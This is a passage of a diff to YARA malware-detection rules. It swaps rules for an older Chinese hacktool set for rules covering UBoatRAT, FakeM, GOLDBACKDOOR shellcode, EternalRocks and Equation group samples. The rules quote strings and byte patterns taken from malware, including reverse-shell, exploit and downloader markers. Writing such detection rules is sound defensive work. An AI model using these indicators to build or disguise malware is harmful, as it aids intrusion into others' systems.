-		description = "Chinese Hacktool Set - file scanms.exe"
+		description = "Detects NirSoft NetResView - utility that displays the list of all network resources"
 		author = "Florian Roth (Nextron Systems)"
-		id = "50393220-35ae-5d3b-ae3f-5d5eb036c043"
-		date = "2015-06-13"
+		id = "bf786432-3ecf-510e-8d95-50aff09826ce"
+		date = "2016-06-04"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L527-L544"
+		reference = "https://goo.gl/Mr6M2J"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_irongate.yar#L67-L82"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "47787dee6ddea2cb44ff27b6a5fd729273cea51a"
-		logic_hash = "d6b33e603953194dab67104cbb9649710515050cf73afb18b2c9083a9e228e6d"
-		score = 75
+		logic_hash = "56c3c7a98bcefa609ee604ea0d7d3f4dd237d91a9439eeed66e0d6f3a20dfdd0"
+		score = 40
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "83f0352c14fa62ae159ab532d85a2b481900fed50d32cc757aa3f4ccf6a13bee"
 
 	strings:
-		$s1 = "--- ScanMs Tool --- (c) 2003 Internet Security Systems ---" fullword ascii
-		$s2 = "Scans for systems vulnerable to MS03-026 vuln" fullword ascii
-		$s3 = "More accurate for WinXP/Win2k, less accurate for WinNT" fullword ascii
-		$s4 = "added %d.%d.%d.%d-%d.%d.%d.%d" fullword ascii
-		$s5 = "Internet Explorer 1.0" fullword ascii
+		$s1 = "NetResView.exe" fullword wide
+		$s2 = "2005 - 2013 Nir Sofer" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and 3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_CN_Tools_Pcshare : FILE
+rule SIGNATURE_BASE_Uboatrat : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file PcShare.exe"
+		description = "Detects UBoat RAT Samples"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0c4e9f9b-9839-56a0-be21-a4e9f19cdfdb"
-		date = "2015-06-13"
+		id = "f7f745c2-648d-5937-8d06-f5d1b6ed7e11"
+		date = "2017-11-29"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L546-L565"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_uboat_rat.yar#L9-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ee7ba9784fae413d644cdf5a093bd93b73537652"
-		logic_hash = "57bd1629abe0af1345f505514b99deb4e63ebce7363f3b0abcb76e7201d9b7b7"
+		logic_hash = "3d0837607d1a5efd9986eccf98f108633502a09dbf8c4c94fc0f0247060bc3a8"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "04873dbd63279228a0a4bb1184933b64adb880e874bd3d14078161d06e232c9b"
+		hash2 = "7b32f401e2ad577e8398b2975ecb5c5ce68c5b07717b1e0d762f90a6fbd8add1"
+		hash3 = "42d8a84cd49ff3afacf3d549fbab1fa80d5eda0c8625938b6d32e18004b0edac"
+		hash4 = "6bea49e4260f083ed6b73e100550ecd22300806071f4a6326e0544272a84526c"
+		hash5 = "cf832f32b8d27cf9911031910621c21bd3c20e71cc062716923304dacf4dadb7"
+		hash6 = "bf7c6e911f14a1f8679c9b0c2b183d74d5accd559e17297adcd173d76755e271"
 
 	strings:
-		$s0 = "title=%s%s-%s;id=%s;hwnd=%d;mainhwnd=%d;mainprocess=%d;cmd=%d;" fullword wide
-		$s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" fullword wide
-		$s2 = "http://www.pcshares.cn/pcshare200/lostpass.asp" fullword wide
-		$s5 = "port=%s;name=%s;pass=%s;" fullword wide
-		$s16 = "%s\\ini\\*.dat" fullword wide
-		$s17 = "pcinit.exe" fullword wide
-		$s18 = "http://www.pcshare.cn" fullword wide
+		$s1 = "URLDownloadToFileA" ascii
+		$s2 = "GetModuleFileNameW" ascii
+		$s4 = "WININET.dll" ascii
+		$s5 = "urlmon.dll" ascii
+		$s6 = "WTSAPI32.dll" ascii
+		$s7 = "IPHLPAPI.DLL" ascii
+		$op1 = { 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68
+               69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F
+               74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20
+               6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 }
+		$vprotect = { 2E 76 6D 70 30 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 6000KB and 3 of them
+		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3c ) ) == 0x4550 and filesize < 1400KB and filesize > 800KB and ( all of ( $s* ) and $op1 at 64 and uint16( uint32( 0x3c ) + 11 ) == 0x59 and $vprotect in ( 600 .. 700 ) )
 }
-rule SIGNATURE_BASE_Pw_Inspector : FILE
+rule SIGNATURE_BASE_Uboatrat_Dropper : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file pw-inspector.exe"
+		description = "Detects UBoatRAT Dropper"
 		author = "Florian Roth (Nextron Systems)"
-		id = "888db647-c5d0-5b1b-bcd2-512c1ebeadea"
-		date = "2015-06-13"
+		id = "f3d4e333-1282-5f6e-9294-628a8230d2a5"
+		date = "2017-11-29"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L567-L582"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_uboat_rat.yar#L52-L69"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4f8e3e101098fc3da65ed06117b3cb73c0a66215"
-		logic_hash = "3b54466d80692923b93689a9e43e30dfbc63e5982cb633120795817098d68e05"
+		logic_hash = "6f8dcc8559fa0ab1644ef6bab9bc875f3d62391c157b373e0355ad03d35e5601"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f4c659238ffab95e87894d2c556f887774dce2431e8cb87f881df4e4d26253a3"
 
 	strings:
-		$s1 = "-m MINLEN  minimum length of a valid password" fullword ascii
-		$s2 = "http://www.thc.org" fullword ascii
-		$s3 = "Use for hacking: trim your dictionary file to the pw requirements of the target." fullword ascii
+		$s1 = "GetCurrenvackageId" fullword ascii
+		$s2 = "fghijklmnopq" fullword ascii
+		$s3 = "23456789:;<=>?@ABCDEFGHIJKLMNOPQ" fullword ascii
+		$s4 = "PMM/dd/y" fullword ascii
+		$s5 = "bad all" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 460KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_Dll_Loadex : FILE
+rule SIGNATURE_BASE_MSIL_SUSP_OBFUSC_Xorstringsnet : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file Dll_LoadEx.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "51235448-751e-51ce-93f8-da48eddb2b7f"
-		date = "2015-06-13"
+		description = "Detects XorStringsNET string encryption, and other obfuscators derived from it"
+		author = "dr4k0nia"
+		id = "f0724ca6-4bfe-5b88-9396-a58aa7461fd6"
+		date = "2023-03-26"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L584-L603"
+		reference = "https://github.com/dr4k0nia/yara-rules"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_net_xorstrings.yar#L2-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "213d9d0afb22fe723ff570cf69ff8cdb33ada150"
-		logic_hash = "588f4f4d0a2f8f8e76de0a5b1217191c1cace69f934582d4fc3c974fb94b8c3e"
+		logic_hash = "6d023a80bd8f5709721c3ace8a7230b847ca4bd2a1aff502a25333ffc8bf75ca"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		version = "1.0"
 
 	strings:
-		$s0 = "WiNrOOt@126.com" fullword wide
-		$s1 = "Dll_LoadEx.EXE" fullword wide
-		$s3 = "You Already Loaded This DLL ! :(" ascii
-		$s10 = "Dll_LoadEx Microsoft " fullword wide
-		$s17 = "Can't Load This Dll ! :(" ascii
-		$s18 = "WiNrOOt" fullword wide
-		$s20 = " Dll_LoadEx(&A)..." fullword wide
+		$pattern = { 06 1E 58 07 8E 69 FE 17 }
+		$a1 = "_CorDllMain" ascii
+		$a2 = "_CorExeMain" ascii
+		$a3 = "mscorlib" ascii fullword
+		$a4 = ".cctor" ascii fullword
+		$a5 = "System.Private.Corlib" ascii
+		$a6 = "<Module>" ascii fullword
+		$a7 = "<PrivateImplementationsDetails{" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 120KB and 3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 25MB and $pattern and 2 of ( $a* )
 }
-rule SIGNATURE_BASE_Dat_Report : FILE
+rule SIGNATURE_BASE_Fakem_Generic : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file report.dll"
+		description = "Detects FakeM malware samples"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c77633a7-0c2f-5efa-b58b-635546bfec95"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L605-L619"
+		id = "51a285ce-a4cb-5068-b079-a8227690365f"
+		date = "2016-01-25"
+		modified = "2023-01-06"
+		reference = "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fakem_backdoor.yar#L8-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4582a7c1d499bb96dad8e9b227e9d5de9becdfc2"
-		logic_hash = "e3b21f37fae388958758af535727844d6e9696862fd9968340e1a619592c53b6"
-		score = 75
+		logic_hash = "0ee606be48961d1e4c1fd9e0e10b53603cfd62cec652baef62f893c0a9e9684c"
+		score = 85
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "631fc66e57acd52284aba2608e6f31ba19e2807367e33d8704f572f6af6bd9c3"
+		hash2 = "3d9bd26f5bd5401efa17690357f40054a3d7b438ce8c91367dbf469f0d9bd520"
+		hash3 = "53af257a42a8f182e97dcbb8d22227c27d654bea756d7f34a80cc7982b70aa60"
+		hash4 = "4a4dfffae6fc8be77ac9b2c67da547f0d57ffae59e0687a356f5105fdddc88a3"
+		hash5 = "7bfbf49aa71b8235a16792ef721b7e4195df11cb75371f651595b37690d108c8"
+		hash6 = "12dedcdda853da9846014186e6b4a5d6a82ba0cf61d7fa4cbe444a010f682b5d"
+		hash7 = "9adda3d95535c6cf83a1ba08fe83f718f5c722e06d0caff8eab4a564185971c5"
+		hash8 = "3209ab95ca7ee7d8c0140f95bdb61a37d69810a7a23d90d63ecc69cc8c51db90"
+		hash9 = "41948c73b776b673f954f497e09cc469d55f27e7b6e19acb41b77f7e64c50a33"
+		hash10 = "53cecc0d0f6924eacd23c49d0d95a6381834360fbbe2356778feb8dd396d723e"
+		hash11 = "523ad50b498bfb5ab688d9b1958c8058f905b634befc65e96f9f947e40893e5b"
 
 	strings:
-		$s1 = "<a href=\"http://www.xfocus.net\">X-Scan</a>" fullword ascii
-		$s2 = "REPORT-ANALYSIS-OF-HOST" fullword ascii
+		$a1 = "\\system32\\kernel32.dll" ascii
+		$a2 = "\\boot.lnk" ascii
+		$a3 = "%USERPROFILE%" fullword ascii
+		$b1 = "Wizard.EXE" fullword wide
+		$b2 = "CommandLineA" fullword ascii
+		$c1 = "\\system32\\kernel32.dll" ascii
+		$c2 = "\\aapz.tmp" ascii
+		$e1 = "C:\\Documents and Settings\\A\\" ascii
+		$e2 = "\\svchost.exe" ascii
+		$e3 = "\\Perform\\Release\\Perform.pdb" ascii
+		$f1 = "Browser.EXE" fullword wide
+		$f2 = "\\browser.exe" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 480KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( all of ( $a* ) or all of ( $b* ) or all of ( $c* ) or all of ( $e* ) or 1 of ( $f* ) )
 }
-rule SIGNATURE_BASE_Dos_Iis7 : FILE
+rule SIGNATURE_BASE_EXT_NK_GOLDBACKDOOR_Inital_Shellcode
 {
 	meta:
-		description = "Chinese Hacktool Set - file iis7.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8813b7a2-0d44-5f26-80ab-0f493c09a027"
-		date = "2015-06-13"
+		description = "Detection for initial shellcode loader used to deploy GOLDBACDOOR"
+		author = "Silas Cutler (silas@Stairwell.com)"
+		id = "daab8e54-11b3-51cc-8bee-55b078f3e791"
+		date = "2022-04-21"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L621-L638"
+		reference = "https://stairwell.com/wp-content/uploads/2022/04/Stairwell-threat-report-The-ink-stained-trail-of-GOLDBACKDOOR.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_goldbackdoor.yar#L2-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0a173c5ece2fd4ac8ecf9510e48e95f43ab68978"
-		logic_hash = "e0cbcb63cd2a542e6394792070392d393b2a3485f5a5ef3c6ba0f113ae9270ec"
-		score = 75
+		logic_hash = "4df97181037a580098dbe34d3b6ceab5c7b83932f1831c36ee99876a8f1524f9"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		version = "0.1"
 
 	strings:
-		$s0 = "\\\\localhost" fullword ascii
-		$s1 = "iis.run" fullword ascii
-		$s3 = ">Could not connecto %s" fullword ascii
-		$s5 = "WHOAMI" ascii
-		$s13 = "WinSta0\\Default" fullword ascii
+		$ = { C7 45 C4 25 6C 6F 63 50 8D 45 C4 C7 45 C8 61 6C 61 70 8B F9 C7 45
+              CC 70 64 61 74 50 B9 BD 88 17 75 C7 45 D0 61 25 5C 6C 8B DA C7 45 D4 6F
+              67 5F 67 C7 45 D8 6F 6C 64 2E C7 45 DC 74 78 74 00 }
+		$ = { 51 50 57 56 B9 E6 8E 85 35 E8 ?? ?? ?? ?? FF D0 }
+		$ = { 6A 40 68 00 10 00 00 52 6A 00 FF 75 E0 B9 E3 18 90 72 E8 ?? ?? ?? ?? FF D0}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 140KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Switchsniffer : FILE
+rule SIGNATURE_BASE_EXT_NK_GOLDBACKDOOR_Injected_Shellcode
 {
 	meta:
-		description = "Chinese Hacktool Set - file SwitchSniffer.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6019f042-10ab-5899-8b1b-28b2609e9623"
-		date = "2015-06-13"
+		description = "Detection for injected shellcode that decodes GOLDBACKDOOR"
+		author = "Silas Cutler (silas@Stairwell.com)"
+		id = "aa921f01-98cc-51ab-877a-e7beede77e36"
+		date = "2022-04-21"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L640-L654"
+		reference = "https://stairwell.com/wp-content/uploads/2022/04/Stairwell-threat-report-The-ink-stained-trail-of-GOLDBACKDOOR.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_goldbackdoor.yar#L22-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1e7507162154f67dff4417f1f5d18b4ade5cf0cd"
-		logic_hash = "4c75473399a7d47b63c6247248fd2792c675740ac671028b1c0a8ba1a02f35aa"
-		score = 75
+		logic_hash = "b45f408c0f342591e66ef0dfcfc1c09f8558c5e8f4bd7f824b30f00d531c7511"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		version = "0.1"
 
 	strings:
-		$s0 = "NextSecurity.NET" fullword wide
-		$s2 = "SwitchSniffer Setup" fullword wide
+		$dec_routine = { 8A 19 57 8B FA 8B 51 01 83 C1 05 85 D2 74 0E 56 8B C1 8B F2 30 18 40 83 EE 01 75 F8 5E 57 }
+		$rtlfillmemory_load = { B9 4B 17 CD 5B 55 56 33 ED 55 6A 10 50 E8 86 00 00 00 FF D0 }
+		$ = "StartModule"
+		$log_file_name = { C7 44 24 3C 25 6C 6F 63 50 8D 44 24 40 C7 44 24 44 61 6C
+                           61 70 50 B9 BD 88 17 75 C7 44 24 4C 70 64 61 74 C7 44 24
+                           50 61 25 5C 6C C7 44 24 54 6F 67 5F 67 C7 44 24 58 6F 6C
+                           64 32 C7 44 24 5C 2E 74 78 74 }
+		$ = { B9 8E 8A DD 8D 8B F0 E8 E9 FB FF FF FF D0 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		3 of them
 }
-rule SIGNATURE_BASE_Dbexpora : FILE
+rule SIGNATURE_BASE_EXT_NK_GOLDBACKDOOR_Generic_Shellcode
 {
 	meta:
-		description = "Chinese Hacktool Set - file dbexpora.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "43297ce9-60f3-5b69-b7d8-904fffe622fe"
-		date = "2015-06-13"
+		description = "Generic detection for shellcode used to drop GOLDBACKDOOR"
+		author = "Silas Cutler (silas@Stairwell.com)"
+		id = "70081d63-0b26-5358-8444-5adc3a44aaa0"
+		date = "2022-04-21"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L656-L671"
+		reference = "https://stairwell.com/wp-content/uploads/2022/04/Stairwell-threat-report-The-ink-stained-trail-of-GOLDBACKDOOR.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_goldbackdoor.yar#L44-L58"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b55b007ef091b2f33f7042814614564625a8c79f"
-		logic_hash = "2dad6cedae6a3a446c2c4829516bffa5608ea4d1c13c907796cf4d13ec37965e"
+		logic_hash = "e046a70b1dee020ba73d960a9d91daaccd0b5c262965c8647f608c5c83a28257"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		version = "0.1"
 
 	strings:
-		$s0 = "SELECT A.USER FROM SYS.USER_USERS A " fullword ascii
-		$s12 = "OCI 8 - OCIDescriptorFree" fullword ascii
-		$s13 = "ORACommand *" fullword ascii
+		$ = { B9 8E 8A DD 8D 8B F0 E8 ?? ?? ?? ?? FF D0 }
+		$ = { B9 8E AB 6F 40 [1-10] 50 [1-10] E8 ?? ?? ?? ?? FF D0 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 835KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Sqlcracker : FILE
+rule SIGNATURE_BASE_Eternalrocks_Taskhost : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file SQLCracker.exe"
+		description = "Detects EternalRocks Malware - file taskhost.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7d7ff2cf-81fb-5a04-a97f-577c306137a9"
-		date = "2015-06-13"
+		id = "8926cdf8-6a3c-5237-80f5-bda9efb39a32"
+		date = "2017-05-18"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L673-L690"
+		reference = "https://twitter.com/stamparm/status/864865144748298242"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_eternalrocks.yar#L12-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1aa5755da1a9b050c4c49fc5c58fa133b8380410"
-		logic_hash = "3724f4b746da413f99880564ae72bc0de867120f1f7eacaf856d42492ebe359e"
+		logic_hash = "45e5295f34280078c586c4cb643dba65aed63beffb1d6ded05de03403caf273a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "cf8533849ee5e82023ad7adbdbd6543cb6db596c53048b1a0c00b3643a72db30"
 
 	strings:
-		$s0 = "msvbvm60.dll" fullword ascii
-		$s1 = "_CIcos" fullword ascii
-		$s2 = "kernel32.dll" fullword ascii
-		$s3 = "cKmhV" fullword ascii
-		$s4 = "080404B0" fullword wide
+		$x1 = "EternalRocks.exe" fullword wide
+		$s1 = "sTargetIP" fullword ascii
+		$s2 = "SERVER_2008R2_SP0" fullword ascii
+		$s3 = "20D5CCEE9C91A1E61F72F46FA117B93FB006DB51" fullword ascii
+		$s4 = "9EBF75119B8FC7733F77B06378F9E735D34664F6" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 125KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_Freeversion_Debug : FILE
+rule SIGNATURE_BASE_Eternalrocks_Svchost : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file debug.exe"
+		description = "Detects EternalRocks Malware - file taskhost.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2d69a39a-0da5-56ca-87a5-9116dea6c950"
-		date = "2015-06-13"
+		id = "c38d3faa-06a2-5f57-a917-91974941352f"
+		date = "2017-05-18"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L692-L711"
+		reference = "https://twitter.com/stamparm/status/864865144748298242"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_eternalrocks.yar#L32-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d11e6c6f675b3be86e37e50184dadf0081506a89"
-		logic_hash = "f7f8302c70c5aed1885724a1bca4efdf0547cc5be62e7dd6bcd8cc2079f71f96"
+		logic_hash = "989df6d582949adbc4e0e2063c99d9ad83c367cedae1030dc23aade091216602"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "589af04a85dc66ec6b94123142a17cf194decd61f5d79e76183db026010e0d31"
 
 	strings:
-		$s0 = "c:\\Documents and Settings\\Administrator\\" ascii
-		$s1 = "Got WMI process Pid: %d" ascii
-		$s2 = "This exploit will execute" ascii
-		$s6 = "Found token %s " ascii
-		$s7 = "Running reverse shell" ascii
-		$s10 = "wmiprvse.exe" fullword ascii
-		$s12 = "SELECT * FROM IIsWebInfo" fullword ascii
+		$s1 = "WczTkaJphruMyBOQmGuNRtSNTLEs" fullword ascii
+		$s2 = "svchost.taskhost.exe" fullword ascii
+		$s3 = "ConfuserEx v" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 820KB and 3 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 2 of them )
 }
-rule SIGNATURE_BASE_Dos_Look : FILE
+rule SIGNATURE_BASE_Apt_Equation_Exploitlib_Mutexes : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file look.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "910d1469-9173-5a7d-91ea-a50ee921f662"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L713-L728"
+		description = "Rule to detect Equation group's Exploitation library http://goo.gl/ivt8EW"
+		author = "Kaspersky Lab"
+		id = "d060bfd7-fb16-55d3-8a39-1197fdd8e759"
+		date = "2016-02-15"
+		modified = "2023-01-27"
+		reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L3-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e1a37f31170e812185cf00a838835ee59b8f64ba"
-		logic_hash = "341c72eaa5db1953e008423374c3f322de0f8dc33fd8181362172982b52e2b8a"
+		logic_hash = "4414dd4ca16d08b8edad26842640960ace434cdde769766fb1c38a1a249565fd"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		version = "1.0"
 
 	strings:
-		$s1 = "<description>CHKen QQ:41901298</description>" fullword ascii
-		$s2 = "version=\"9.9.9.9\"" fullword ascii
-		$s3 = "name=\"CH.Ken.Tool\"" fullword ascii
+		$a1 = "prkMtx" wide
+		$a2 = "cnFormSyncExFBC" wide
+		$a3 = "cnFormVoidFBC" wide
+		$a4 = "cnFormSyncExFBC"
+		$a5 = "cnFormVoidFBC"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them
+		uint16( 0 ) == 0x5A4D and any of ( $a* )
 }
-rule SIGNATURE_BASE_Ntgodmode : FILE
+rule SIGNATURE_BASE_Apt_Equation_Equationlaser_Runtimeclasses
 {
 	meta:
-		description = "Chinese Hacktool Set - file NtGodMode.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3de620bf-0405-536b-9f6d-3a7f02417b20"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L730-L747"
+		description = "Rule to detect the EquationLaser malware"
+		author = "Kaspersky Lab"
+		id = "924c80ca-3607-57aa-85a2-b33ff52b0c1b"
+		date = "2015-02-16"
+		modified = "2025-03-29"
+		reference = "https://securelist.com/blog/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L40-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8baac735e37523d28fdb6e736d03c67274f7db77"
-		logic_hash = "55efa908ebfcede207d3fe0b1072cce262af0e627e91ba8746e7a8924b8e75bd"
+		logic_hash = "663ea56f869f7099a92658df5bddd76d4e5ba8ac5dfc693733579682b9eee860"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		version = "1.0"
 
 	strings:
-		$s0 = "to HOST!" fullword ascii
-		$s1 = "SS.EXE" fullword ascii
-		$s5 = "lstrlen0" fullword ascii
-		$s6 = "Virtual" fullword ascii
-		$s19 = "RtlUnw" fullword ascii
+		$a1 = "?a73957838_2@@YAXXZ"
+		$a2 = "?a84884@@YAXXZ"
+		$a3 = "?b823838_9839@@YAXXZ"
